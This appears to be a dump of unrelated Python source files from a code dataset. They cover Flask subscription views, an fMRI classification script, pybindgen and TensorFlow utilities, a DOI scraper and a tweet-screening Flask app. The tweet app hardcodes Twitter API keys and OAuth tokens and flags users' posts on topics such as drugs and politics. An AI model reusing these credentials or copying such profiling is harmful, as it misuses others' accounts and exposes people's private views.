flask_security import (current_user,\n login_required,\n auth_required)\n\nfrom feedrsub.database import db\nfrom feedrsub.models.author import Author\nfrom feedrsub.models.email import Email\nfrom feedrsub.models.period import Period, PERIOD\nfrom feedrsub.models.subscription import Subscription\nfrom feedrsub.models.user import User\nfrom feedrsub.subscriptions import subscription_blueprint as bp\nfrom feedrsub.subscriptions.subscriptionhandler import SubscriptionHandler\nfrom feedrsub.subscriptions.tasks import task_send_periodic_updates\nfrom feedrsub.utils.flash import ALERT\nfrom feedrsub.utils.redirect_back import redirect_back\nfrom feedrsub.utils.security import require_cron_api_key\nfrom feedrsub.utils.signals import update_user_rss\n\n\n@bp.route('/cron/update/', methods=['POST'])\n@require_cron_api_key\ndef send_update():\n \"\"\"\n Sends email updates for the specified period. If user_id is not\n provided then send emails to all users.\n \"\"\"\n period_name = request.args.get('period', None)\n if not period_name:\n return make_response('Missing Query argument: period\\n', 400)\n user_id = request.args.get('user_id', None)\n\n task_send_periodic_updates.delay(period_name, user_id)\n\n return make_response('Sending Periodic Updates\\n', 200)\n\n\n@bp.route('/subscribe/', methods=['POST'])\n@login_required\ndef subscribe(author_id):\n \"\"\"\n Create a Subscription to an author\n \"\"\"\n author = Author.query.get_or_404(author_id)\n\n sub = db.session\\\n .query(Subscription)\\\n .filter(Subscription.user_id == current_user.id,\n Subscription.author_id == author.id)\\\n .first()\n\n if not sub:\n sub = Subscription(user=current_user, author=author, active=True)\n app.logger.info('%s created', sub)\n else:\n sub.active = True\n app.logger.info('%s set to active', sub)\n\n if not sub.periods:\n sub.add_period(PERIOD.DAILY)\n\n sub.save()\n\n update_user_rss.send(bp, users=[current_user])\n\n flash(f'Successfully created a {sub.period_string()} Email Subscription to {author.name}', ALERT.SUCCESS)\n\n return redirect_back('authors.authors')\n\n\n@bp.route('/unsubscribe/', methods=['POST'])\n@login_required\ndef unsubscribe(author_id):\n \"\"\"\n Unsubscribe from an Author\n \"\"\"\n author = Author.query.get_or_404(author_id)\n\n sub = db.session\\\n .query(Subscription)\\\n .filter(Subscription.user_id == current_user.id,\n Subscription.author_id == author_id)\\\n .first()\n\n if not sub:\n app.logger.warning('No subscription found for %s and %s', current_user, author)\n\n flash(f'No Subscription found for {author.name}', ALERT.WARNING)\n\n return redirect(url_for('authors.authors'))\n\n sub.active = False\n sub.save()\n\n app.logger.info('%s set to inactive', sub)\n\n update_user_rss.send(bp, users=[current_user])\n\n flash(f'Successfully Unsubscribed from {author.name}', ALERT.SUCCESS)\n\n return redirect_back('authors.authors')\n\n\n@bp.route('/remove_period', methods=['POST'])\n@auth_required('session', 'basic')\ndef remove_period():\n \"\"\"\n Remove an Email notification Period from a Subscription\n \"\"\"\n period_name = request.args.get('period')\n sub_id = request.args.get('subscription_id')\n\n sub = Subscription.query.filter_by(id=sub_id).first()\n sub.remove_period(period_name)\n sub.save()\n\n if len(sub.periods) == 0:\n flash(\n f'You will no longer receive Email notifications for {sub.author.name}', ALERT.WARNING)\n\n app.logger.info('Period %s removed from %s', period_name, sub)\n\n flash(f'Successfully removed {period_name} Email from Subscription to {sub.author.name}', ALERT.SUCCESS)\n\n return redirect_back('users.user_home')\n\n\n@bp.route('/add_period', methods=['POST'])\n@auth_required('session', 'basic')\ndef add_period():\n \"\"\"\n Add an email notification period to a Subscription\n \"\"\"\n period_name = request.args.get('period')\n sub_id = request.args.get('subscription_id')\n\n sub = Subscription.query.filter_by(id=sub_id).first()\n\n if sub.has_period(period_name):\n flash(f'You already receive {period_name} Emails for {sub.author.name}', ALERT.WARNING)\n\n return redirect(url_for('users.user_home'))\n\n sub.add_period(period_name)\n sub.save()\n\n app.logger.info('Period %s added to %s', period_name, sub)\n\n flash(f'Successfully added {period_name} Email to your Subscription to {sub.author.name}', ALERT.SUCCESS)\n\n return redirect_back('users.user_home')\n\n\n@bp.route('/email/unsubscribe/', methods=['GET'])\ndef unsubscribed_email(hashstr):\n \"\"\"\n Handle Email Unsubscribe links. Unsubscribes from all Subscriptions\n with the given period.\n \"\"\"\n try:\n user_id, period_id = Email.unsubscribe_hash_valid(hashstr)\n except itsdangerous.BadTimeSignature:\n message = 'the unsubscribe link for this email has expired.\\n' \\\n 'Please try again with a more recent email, or login and unsubscribe manually.'\n return render_template('email_unsubscribe/failure.html', message=message)\n except itsdangerous.BadData as e:\n app.logger.error('Unsubscribe attempt with bad data. %s', e.message)\n message = 'the unsubscribe link was not valid'\n return render_template('email_unsubscribe/failure.html', message=message)\n\n period = Period.query.filter_by(id=period_id).first()\n if not period:\n message = 'no valid subscription period was found'\n return render_template('email_unsubscribe/failure.html', message=message)\n\n user = User.query.with_entities(User.id).filter_by(id=user_id).first()\n if not user:\n message = 'no valid user was found'\n return render_template('email_unsubscribe/failure.html', message=message)\n\n subs = SubscriptionHandler.get_user_subscriptions_for_period(user_id, period.name)\n if not subs:\n message = f'You are already unsubscribed from all {period.name} emails.'\n return render_template('email_unsubscribe/success.html', message=message)\n\n for sub in subs:\n sub.remove_period(period)\n\n db.session.commit()\n\n app.logger.info(\n 'Unsubscribed User %s from %s Subscriptions with Period %s',\n user, len(subs), period)\n\n message = f'You have successfully unsubscribed from all {period.name} emails.'\n return render_template('email_unsubscribe/success.html', message=message)\n","sub_path":"feedrsub/subscriptions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"500241326","text":"\"\"\"\nTransduction,\nGLobal normalization, use all data to learn mean and std\ndo the normalization only one time even for different cv splits\nIndividual normalization, normalization subject by subject\ndo the normalization only one time for different cv splits\nacross-subject-split use 90 subjects' data as train set\nwithin-subject-split use 90% of each subject's data as train set\n\"\"\"\nimport numpy as np\n\nimport os.path as op\nimport tables\nimport time\n\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\n\ndef transduction(\n classifier_type, data_x, label_y, \n cv_split, train_len):\n starttime = time.time()\n accuracy = []\n for split in cv_split:\n classifier_type.fit(\n data_x[split[:train_len]], label_y[split[:train_len]])\n prediction = classifier_type.predict(data_x[split[train_len:]])\n score = ((prediction == label_y[split[train_len:]]).sum()\n / float(len(split[train_len:])))\n accuracy.append(score)\n print(time.time() - starttime)\n print(accuracy)\n print(np.mean(accuracy))\n return accuracy\n\nn = 3\nsliceno = 1000\ntrain_size = 3600\nhem = 'lh'\nc_svc = 0.001\np_logis, c_logis = ('l2', 0.001)\nsvc = SVC(kernel='linear', C=c_svc)\nlogis = LogisticRegression(penalty=p_logis, C=c_logis, n_jobs=1)\n\n\ndata_dir = '/hpc/crise/tva_rect_100subjects_voice_localizer'\ndata_path = op.join(data_dir, '{}.100subjects_data.h5'.format(hem))\nh5file = tables.open_file(data_path, driver=\"H5FD_CORE\")\ndata = h5file.root.data[:]\nsubjects = h5file.root.subjects[:]\ny_class = h5file.root.y_class[:]\ny_stim = h5file.root.y_stim[:]\nh5file.close()\n\ndata_flat = data.flatten().reshape(4000, 5400)\ny_target = np.array(y_class)\n\n\n# Do normalization subject by subject (individual)\ndata_stand_indi = data_flat[:]\ndata_minmax_indi = data_flat[:]\nfor j in range(100):\n start = 40 * j\n end = start + 40\n data_stand_indi[start:end] = StandardScaler().fit_transform(\n data_flat[start:end])\n data_minmax_indi[start:end] = MinMaxScaler().fit_transform(\n data_flat[start:end])\n\n# Do global normalization\ndata_stand_global = StandardScaler().fit_transform(data_flat[:])\ndata_minmax_global = MinMaxScaler().fit_transform(data_flat[:])\n\n# CV splits about cross-subject-splits and within-subject-splits\ndata_dir = '/hpc/crise/wang.q/src_code/Pycharm_Projects' \\\n '/100_subjects_voice_classification/'\ndata_path = op.join(data_dir,\n '100subjects_cv_splits_shuffle.h5')\nh5file = tables.open_file(data_path, driver=\"H5FD_CORE\")\ncv_across = h5file.root.cv_across[:]\ncv_within = h5file.root.cv_within[:]\nh5file.close()\n\nout_dir = '/hpc/crise/wang.q/src_code/Pycharm_Projects' \\\n '/100_subjects_voice_classification/'\n\n\nif n == 0:\n # Golbal normalization with across-subject-split\n # Use the same cv_across splits\n data = np.zeros(4 * sliceno).reshape(4, sliceno)\n data[0] = global_across_svc_stand = transduction(\n svc, data_stand_global, y_target, cv_across[:sliceno], train_size)\n data[1] = global_across_lr_stand = transduction(\n logis, data_stand_global, y_target, cv_across[:sliceno], train_size)\n data[2] = global_across_svc_minmax = transduction(\n svc, data_minmax_global, y_target, cv_across[:sliceno], train_size)\n data[3] = global_across_lr_minmax = transduction(\n logis, data_minmax_global, y_target, cv_across[:sliceno], train_size)\n\n out_path = op.join(\n out_dir, '100subjects_inter_subjects_transduction_global_across_{}.h5'.format(hem))\n h5file = tables.open_file(out_path, \"w\", driver=\"H5FD_CORE\")\n h = h5file.create_array(\n h5file.root, 'global_across_svc_stand', global_across_svc_stand)\n h = h5file.create_array(\n h5file.root, 'global_across_lr_stand', global_across_lr_stand)\n h = h5file.create_array(\n h5file.root, 'global_across_svc_minmax', global_across_svc_minmax)\n h = h5file.create_array(\n h5file.root, 'global_across_lr_minmax', global_across_lr_minmax)\n h = h5file.create_array(\n h5file.root, 'data', data)\n h5file.close()\n\nelif n == 1:\n # Global normalization for within-subject-split\n # Use the same cv_within\n data = np.zeros(4 * sliceno).reshape(4, sliceno)\n data[0] = global_within_svc_stand = transduction(\n svc, data_stand_global, y_target, cv_within[:sliceno], train_size)\n data[1] = global_within_lr_stand = transduction(\n logis, data_stand_global, y_target, cv_within[:sliceno], train_size)\n data[2] = global_within_svc_minmax = transduction(\n svc, data_minmax_global, y_target, cv_within[:sliceno], train_size)\n data[3] = global_within_lr_minmax = transduction(\n logis, data_minmax_global, y_target, cv_within[:sliceno], train_size)\n out_path = op.join(\n out_dir, '100subjects_inter_subjects_transduction_global_within_{}.h5'.format(hem))\n h5file = tables.open_file(out_path, \"w\", driver=\"H5FD_CORE\")\n h = h5file.create_array(\n h5file.root, 'global_within_svc_stand', global_within_svc_stand)\n h = h5file.create_array(\n h5file.root, 'global_within_lr_stand', global_within_lr_stand)\n h = h5file.create_array(\n h5file.root, 'global_within_svc_minmax', global_within_svc_minmax)\n h = h5file.create_array(\n h5file.root, 'global_within_lr_minmax', global_within_lr_minmax)\n h = h5file.create_array(\n h5file.root, 'data', data)\n h5file.close()\n\nelif n == 2:\n # Individual normalization for across-subject-split\n # Use the same cv_across splits\n data = np.zeros(4 * sliceno).reshape(4, sliceno)\n data[0] = indi_across_svc_stand = transduction(\n svc, data_stand_indi, y_target, cv_across[:sliceno], train_size)\n data[1] = indi_across_lr_stand = transduction(\n logis, data_stand_indi, y_target, cv_across[:sliceno], train_size)\n data[2] = indi_across_svc_minmax = transduction(\n svc, data_minmax_indi, y_target, cv_across[:sliceno], train_size)\n data[3] = indi_across_lr_minmax = transduction(\n logis, data_minmax_indi, y_target, cv_across[:sliceno], train_size)\n\n out_path = op.join(\n out_dir, '100subjects_inter_subjects_transduction_individual_across_{}.h5'.format(hem))\n h5file = tables.open_file(out_path, \"w\", driver=\"H5FD_CORE\")\n h = h5file.create_array(\n h5file.root, 'indi_across_svc_stand', indi_across_svc_stand)\n h = h5file.create_array(\n h5file.root, 'indi_across_lr_stand', indi_across_lr_stand)\n h = h5file.create_array(\n h5file.root, 'indi_across_svc_minmax', indi_across_svc_minmax)\n h = h5file.create_array(\n h5file.root, 'indi_across_lr_minmax', indi_across_lr_minmax)\n h = h5file.create_array(\n h5file.root, 'data', data)\n h5file.close()\n\nelse:\n # Individual normalization for within-subject-split\n # Use the same cv_within\n data = np.zeros(4 * sliceno).reshape(4, sliceno)\n data[0] = indi_within_svc_stand = transduction(\n svc, data_stand_indi, y_target, cv_within[:sliceno], train_size)\n data[1] = indi_within_lr_stand = transduction(\n logis, data_stand_indi, y_target, cv_within[:sliceno], train_size)\n data[2] = indi_within_svc_minmax = transduction(\n svc, data_minmax_indi, y_target, cv_within[:sliceno], train_size)\n data[3] = indi_within_lr_minmax = transduction(\n logis, data_minmax_indi, y_target, cv_within[:sliceno], train_size)\n out_path = op.join(\n out_dir, '100subjects_inter_subjects_transduction_individual_within_{}.h5'.format(hem))\n h5file = tables.open_file(out_path, \"w\", driver=\"H5FD_CORE\")\n h = h5file.create_array(\n h5file.root, 'indi_within_svc_stand', indi_within_svc_stand)\n h = h5file.create_array(\n h5file.root, 'indi_within_lr_stand', indi_within_lr_stand)\n h = h5file.create_array(\n h5file.root, 'indi_within_svc_minmax', indi_within_svc_minmax)\n h = h5file.create_array(\n h5file.root, 'indi_within_lr_minmax', indi_within_lr_minmax)\n h = h5file.create_array(\n h5file.root, 'data', data)\n h5file.close()\n\n","sub_path":"100_subjects_voice_classification_transduction.py","file_name":"100_subjects_voice_classification_transduction.py","file_ext":"py","file_size_in_byte":8149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"404155264","text":"#! /usr/bin/env python\n\nimport sys, os\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)),\n '..', '..'))\n\n#import pybindgen\n#import pybindgen.utils\n#from pybindgen.typehandlers import base as typehandlers\nfrom pybindgen import Module, FileCodeSink, param, retval\n#from pybindgen import CppMethod, CppConstructor, CppClass, Enum\n#from pybindgen.function import CustomFunctionWrapper\n#from pybindgen.cppmethod import CustomCppMethodWrapper\nfrom pybindgen import cppclass\nfrom pybindgen.typehandlers.smart_ptr import BoostSharedPtr\n\n#from pybindgen import param, retval\n\nimport pybindgen.settings\npybindgen.settings.deprecated_virtuals = False\n\n\ndef my_module_gen(out_file):\n\n mod = Module('bsp')\n\n mod.add_include ('\"bsp.h\"')\n\n Foo = mod.add_class('Foo', memory_policy=BoostSharedPtr('::Foo'))\n\n Foo.add_constructor([param('std::string', 'datum')])\n Foo.add_constructor([])\n Foo.add_method('get_datum', retval('const std::string'), [])\n Foo.add_method('set_datum', None, [param('const std::string', 'datum')])\n\n\n mod.add_function('function_that_takes_foo', None,\n [param('boost::shared_ptr', 'foo')])\n\n mod.add_function('function_that_returns_foo', retval('boost::shared_ptr'), [])\n \n ## ---- finally, generate the whole thing ----\n mod.generate(FileCodeSink(out_file))\n\n\nif __name__ == '__main__':\n my_module_gen(sys.stdout)\n\n","sub_path":"ns3/pybindgen-0.17.0.post57+nga6376f2/examples/boost_shared_ptr/modulegen.py","file_name":"modulegen.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511777295","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nimport tensorflow as tf\n#import threading\nimport config\n\n\n\nclass multiModalData(object):\n \"\"\"\n This class manages the data i/o for a multi modal multi task model.\n \"\"\"\n def __init__(self,hdf5Pointer,inputList,outputList=None,sampleSize=None):\n self.inputList = inputList\n self.outputList = outputList\n self.inputs = {}\n self.inputShape = {}\n for inp in inputList:\n print(hdf5Pointer.keys())\n self.inputs[inp] = hdf5Pointer.get(inp)\n print(self.inputs[inp].shape)\n self.inputShape[inp] = (-1,)+self.inputs[inp].shape[1:] + (1,)\n\n self.outputs = {}\n self.outputShape = {}\n for inp in outputList:\n self.outputs[inp] = hdf5Pointer.get(inp)\n\n self.outputShape[inp] = self.outputs[inp].shape[2:] if inp != 'DNAseq' else self.outputs[inp].shape[1:]\n\n self.sampleSize = sampleSize if sampleSize is not None else self.inputs[inputList[0]][:].shape[0]\n print('Sample size: '+ str(self.sampleSize))\n\n def splitTest(self,ratio=0.8):\n assert self.sampleSize>1, 'Sample size must be greater than 1'\n if config.FLAGS.trainSize is not None:\n self.trainSize = config.FLAGS.trainSize\n else:\n assert ratio > 1./self.sampleSize, 'Train ratio is unreasonably low. Please consider a reasonable ratio, e.g. 0.8'\n if ratio >(1-1./self.sampleSize):\n print('Train ratio is unreasonably high. It is set to the default value i.e. 0.8')\n ratio = 0.8\n self.trainSize = np.int(self.sampleSize*ratio)\n print(config.FLAGS.testSize)\n if config.FLAGS.testSize is not None:\n self.testSize = config.FLAGS.testSize\n\n else:\n self.testSize = self.sampleSize - self.trainSize\n\n allIdx = np.arange(0, self.sampleSize)\n np.random.shuffle(allIdx)\n self.trainIdx = allIdx[:self.trainSize].tolist()\n self.testIdx = np.sort(allIdx[self.trainSize:(self.trainSize+self.testSize)]).tolist()\n\n def dataBatcher(self,chunkSize=10):\n \"\"\" An generator object for batching the input-output \"\"\"\n\n assert chunkSize>=config.FLAGS.batchSize,'Chunk size must be at least batch size..'\n print('sample size: ' + str(self.sampleSize))\n print('train size:' + str(self.trainSize))\n print('test size:' + str(self.testSize))\n print( 'chunk size:' + str(chunkSize))\n print( 'batch size: ' + str(config.FLAGS.batchSize))\n while True:\n # shuffle outputs and inputs\n for chunkIdx in range(0,self.trainSize-chunkSize, chunkSize):\n chunkSliceIdx = np.sort(self.trainIdx[chunkIdx:(chunkIdx + chunkSize)]).tolist()\n inputChunk={}\n outputChunk={}\n for key in self.inputList:\n ## regularization via nullifying input\n\n inputChunk[key] = self.inputs[key][chunkSliceIdx].reshape(self.inputShape[key])\n for key in self.outputList:\n if key != 'DNAseq':\n outputChunk[key] = np.squeeze(self.normalize(self.outputs[key][chunkSliceIdx,0,:]))\n else:\n outputChunk[key] = np.squeeze(self.outputs[key][chunkSliceIdx,:,:])\n\n for batchIdx in range(0, chunkSize-config.FLAGS.batchSize, config.FLAGS.batchSize):\n yield {key:inp[batchIdx:(batchIdx + config.FLAGS.batchSize)] for key,inp in inputChunk.items()},\\\n {key:inp[batchIdx:(batchIdx + config.FLAGS.batchSize)] for key,inp in outputChunk.items()}\n\n def getTestData(self):\n print('start...')\n inputBatch = {}\n outputBatch = {}\n print(len(self.testIdx))\n for key in self.inputList:\n inputBatch[key] = self.inputs[key][self.testIdx].reshape(self.inputShape[key])\n print('input done ' + key)\n for key in self.outputList:\n if key != 'DNAseq':\n outputBatch[key] = np.squeeze(self.normalize(self.outputs[key][self.testIdx,0,:]))\n else:\n outputBatch[key] = np.squeeze(self.outputs[key][self.testIdx,:,:])\n return inputBatch, outputBatch\n\n def getAllData(self,shuffle=False):\n\n return {key:self.inputs[key][:][:,:,:,None] for key in self.inputList},\\\n {key:np.squeeze(self.normalize(self.outputs[key][:,0,:])) for key in self.outputList}\n\n\n def normalize(self,tensor):\n return np.divide(tensor.T+1e-16,tensor.sum(axis=1)+tensor.shape[1]*1e-16).T\n\n\n\n\n\n#### Under development #####\n\nclass CustomRunner(object):\n \"\"\"\n This class manages the background threads needed to fill\n a queue full of data.\n \"\"\"\n def __init__(self):\n allShapes=[]\n self.inputs = []\n self.outputs = []\n\n for inputName in config.FLAGS.data.inputList:\n shp =[sh for sh in config.FLAGS.data.inputShape[inputName]]\n self.inputs.append(tf.placeholder(tf.float32, shape=[None]+shp,name=inputName))\n allShapes.append(shp)\n for outputName in config.FLAGS.data.outputList:\n shp =[sh for sh in config.FLAGS.data.outputShape[outputName]]\n self.outputs.append(tf.placeholder(tf.float32, shape=[None]+shp,name=outputName))\n allShapes.append(shp)\n print('Input Shapes:', allShapes)\n # The actual queue of config.FLAGS.data. The queue contains a vector for input and output data\n\n self.queue = tf.RandomShuffleQueue(shapes=allShapes,\n dtypes=len(allShapes)*[tf.float32],\n capacity=200,\n min_after_dequeue=100)\n\n self.enqueue_op = self.queue.enqueue_many(self.inputs+self.outputs)\n\n def getBatch(self):\n \"\"\"\n Return's tensors containing a batch of inpust and outputs\n \"\"\"\n dequedBatch = self.queue.dequeue_many(config.FLAGS.batchSize)\n inputBatch = dequedBatch[:len(self.inputs)]\n outputBatch = dequedBatch[len(self.inputs):]\n\n return inputBatch, outputBatch\n\n\n def thread_main(self, sess):\n \"\"\"\n Function run on alternate thread. Basically, keep adding data to the queue.\n \"\"\"\n for inputBatch, outputBatch in config.FLAGS.data.dataBatcher():\n sess.run(self.enqueue_op, feed_dict={i: d for i, d in zip(self.inputs+self.outputs, inputBatch+outputBatch)})\n\n def start_threads(self, sess,n_threads=1):\n \"\"\" Start background threads to feed queue \"\"\"\n threads = []\n for n in range(n_threads):\n t = threading.Thread(target=self.thread_main, args=(sess,))\n t.daemon = True # thread will close when parent quits\n t.start()\n threads.append(t)\n return threads\n","sub_path":"fiddle/dataClass.py","file_name":"dataClass.py","file_ext":"py","file_size_in_byte":7047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"25688727","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-x86_64/egg/utopia/tools/doi.py\n# Compiled at: 2017-06-20 22:46:59\nimport re\n_inner_regex = '(10\\\\.\\\\d+/[^%\"\\\\#\\\\s]+)'\n_strip_regex = '[^\\\\d\\\\w]+'\n\ndef search(text):\n \"\"\"Look for first DOI in some text\"\"\"\n match = re.search(_inner_regex, text)\n if match is not None:\n return re.sub(('(^{0}|{0}$)').format(_strip_regex), '', match.group(0))\n else:\n return\n\n\ndef findall(text):\n \"\"\"Look for all DOIs in some text\"\"\"\n matches = re.findall(_inner_regex, text)\n return [ re.sub(('(^{0}|{0}$)').format(_strip_regex), '', match) for match in matches ]\n\n\n__all__ = [\n 'search', 'findall']\ntry:\n import spineapi\n _regex = '(?:(?:doi|digital\\\\s+object\\\\s+id(?:entifier)?)\\\\s*\\\\S?\\\\s*)?' + _inner_regex\n\n def scrape(document):\n \"\"\"Look for a DOI in the document\"\"\"\n margin = 90\n dois = []\n for match in document.search(_regex, spineapi.IgnoreCase + spineapi.RegExp):\n page, _, (_, _), (width, height) = pageArea = match.begin().pageArea()\n _, orientation, (left, top), (right, bottom) = lineArea = match.begin().lineArea()\n if page > 2:\n break\n if page == 2 and len(dois) > 0:\n break\n if orientation > 0:\n dois[0:0] = [\n match.text()]\n elif top > height - margin:\n dois[0:0] = [\n match.text()]\n else:\n dois.append(match.text())\n\n if len(dois) > 0:\n doi = dois[0]\n doi = re.search(_inner_regex, doi).group(0)\n doi = re.sub(('(^{0}|{0}$)').format(_strip_regex), '', doi)\n doi = re.sub('[-\\xad‐‑–-―⸺⸻]', '-', doi)\n return doi\n\n\n __all__[:] = ['scrape']\nexcept ImportError:\n logger.info('spineapi not imported: document scraping of DOIs will be unavailable')\n spineapi = None","sub_path":"pycfiles/pyutopia_tools-3.1.0.10-py2.7/doi.py","file_name":"doi.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"343932391","text":"#render template so that we can use the template\r\n#templates directory is for HTML files that you can plug data into\r\n#static directory is for things that dont change like the css file\r\nfrom flask import Flask, render_template, request\r\n#import BaseConverter\r\nfrom werkzeug import routing\r\n\r\n\r\n#instilize the flask application\r\napp = Flask(__name__, static_url_path=\"\", static_folder=\"static\")\r\n\r\nclass RegexConvertor(routing.BaseConverter):\r\n def __init__(self, url_map, *items):\r\n super(RegexConvertor, self).__init__(url_map)\r\n self.regex = items[0]\r\n\r\n#use the RegexConvertor function as a converter\r\n#method for mapped urls\r\napp.url_map.converters['regex'] = RegexConvertor\r\n\r\n#this route will show some links matching(or not)\r\n#the regex that we are setting on the next route\r\n@app.route('/-/')\r\ndef example(uid, slug):\r\n return \"uid: %s, slug: %s\" % (uid, slug)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n #whenever this URL is reached, the program is going to look for a file called homepage.html\r\n #filter will be the inputted name\r\n #whatever return value you have is basically the response of the server so you can put HTML directly in it\r\n #you almost never want to put HTML in this file\r\n return render_template(\"homepage.html\")\r\n\r\n ##return 'Method used %s' % request.method\r\n\r\n\r\n\r\n@app.route('//')\r\ndef filters(handle, filter=None):\r\n\r\n # import twython\r\n from twython import Twython\r\n # import simplejson\r\n import simplejson\r\n # import RegEx (only find all function)\r\n from re import findall\r\n # import RegEx(find)\r\n import re\r\n\r\n # pip install twython\r\n # Requires Authentication as of Twitter API v1.1\r\n t = Twython(app_key='z8eLwuxMOedusXmzOHvFIQX0o', # REPLACE 'APP_KEY' WITH YOUR APP KEY, ETC., IN THE NEXT 4 LINES\r\n app_secret='3KF164w8GLG7Tg6Nb5czMmCE2j54uOuS6GvNMM4130FYJXiVc7',\r\n oauth_token='752567920316837888-T5se5iPGLJbLcS4Jnfh1q4tNBHpK3My',\r\n oauth_token_secret='oXejT8THNR33ziZMhRSpWdPAgC4xEh4HxKBtzE5cOU2my')\r\n\r\n # allows user input for twitter handle (-@)\r\n twitter_handle = handle\r\n\r\n # get the user's tweets including retweets\r\n user_tweets = t.get_user_timeline(screen_name=twitter_handle, use_expanded_url=True, include_rts=True, count=200)\r\n\r\n # parse 200 tweets\r\n # next time you call the API set max ID to last twitter ID you\r\n\r\n\r\n # write the list of dictionaries into a .txt file\r\n #f = open('output.txt', 'w')\r\n #simplejson.dump(user_tweets, f)\r\n #f.close()\r\n\r\n # read in the .txt file into a string\r\n #f = open('output.txt', 'r')\r\n #all_lines = f.read()\r\n #f.close()\r\n ##print(\"File contents: \", all_lines)\r\n all_lines = str(user_tweets)\r\n #all_lines = \"Bernie wall terrorism buckets popcorn vmware muslim\"\r\n\r\n # make the search term input = profanity and then it searches those words\r\n search = filter\r\n\r\n # if they search the word profanity, it will filter the text to find these words\r\n if search == \"profanity\":\r\n # RegEx to search the .txt file for keywords\r\n regex = \"'text': '([^']*( shit | fuck | damn | bitch | ass )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n # if they search the string 'nice things', then it will filter the text to find the word love\r\n if search == \"nice things\":\r\n regex = \"'text': '([^']*( love | volunteering | donation | donate | charity | award | happiness | gratitude | success )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n\r\n # if they search 'drugs', then it will show up with anything to do with 421, etc.\r\n if search == \"drugs\":\r\n regex = \"'text': '([^']*( marijuana | coccaine | weed | 420 | crack | blazin | heroin | joint | cannabis | hash | hemp | dope | drug | pot )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n\r\n # if they search the string 'alcohol', then it will filter the text to find alcohol\r\n if search == \"alcohol\":\r\n regex = \"'text': '([^']*( shots | party | beer )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n\r\n # if they search the string 'school', then it will filter the text to find things to do with college\r\n if search == \"school\":\r\n regex = \"'text': '([^']*( school | AP | honors | class )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n\r\n # if they search the string 'politics', then it will filter the text to find donald trump's offensive shit\r\n if search == \"politics\":\r\n regex = \"'text': '([^']*( hispanics | Republican | Democrat | Hillary | Trump | Bernie | wall | immigration | alien | gun | Muslim | terrorist )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n # if they search the string 'coding', then it will filter the text to find things to do with coding\r\n if search == \"coding\":\r\n regex = \"'text': '([^']*( code | coding | Python | Java | tech | programming | robotic | hack| software | API | JavaScript )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n # if they search the string 'employment', then it will filter the text to find things to do with the workplace\r\n if search == \"employment\":\r\n regex = \"'text': '([^']*( job | boss | worker | work | internship )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n ### if they search the string 'school', then it will filter the text to find things to do with college\r\n ##if search == \"employment\":\r\n ##regex = \"'text': '([^']*( job | boss | worker | work | internship )[^']*)'\"\r\n\r\n ##dataCrop = findall(regex, all_lines)\r\n #dataCrop = findall(\"Bernie\", all_lines)\r\n print(\"datacrop\")\r\n #print(dataCrop)\r\n\r\n\r\n #tweets = dataCrop\r\n listlength = len(dataCrop)\r\n\r\n\r\n for x in dataCrop:\r\n print(x)\r\n\r\n if dataCrop == []:\r\n dataCrop = [(\"This filter returned no flagged tweets from this user.\", \"\")]\r\n\r\n words = \"(\"\r\n data = str(dataCrop)\r\n count = data.count(words)\r\n return render_template(\"filters.html\", tweets=dataCrop, filter=filter, count=count, handle=handle)\r\n\r\n\r\n #return render_template(handle + \" has been flagged \" + str(count) + \" time(s) for \" + filter)\r\n\r\n#this regex will match any combination of letters and numbers between 4 and 6 characters, followed by a - and a slug,\r\n#a text string the first part will get the identifier \"uid\", while the slug is going to be called slug\r\n#both parameters are passed to the view, that will print both values to prove they are correct\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()","sub_path":"twitcherFinal/twitcher_files.py","file_name":"twitcher_files.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"79528140","text":"# -*- coding:utf-8 -*-\nimport requests\nimport re\n\nagent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'\nheaders = {\n 'User-Agent': agent\n}\nsession = requests.session()\nindex_url = 'https://www.zhihu.com'\n# 获取登录时需要用到的_xsrf\nindex_page = session.get(index_url, headers=headers)\nhtml = index_page.text\npattern = r'name=\"_xsrf\" value=\"(.*?)\"'\n# 这里的_xsrf 返回的是一个list\n_xsrf = re.findall(pattern, html)\nprint (_xsrf[0])\n# 得到_xsrf","sub_path":"untitled/zhihuSessionTEst.py","file_name":"zhihuSessionTEst.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"104320883","text":"import numpy as np \nimport skimage\nimport gradModule\nimport cv2\nimport acceleratedPrimalDual\n# that's a warper for the method skimage.restoration.denoise_tv_chambolle , that resolve the problem :\n# argmin int_{u} 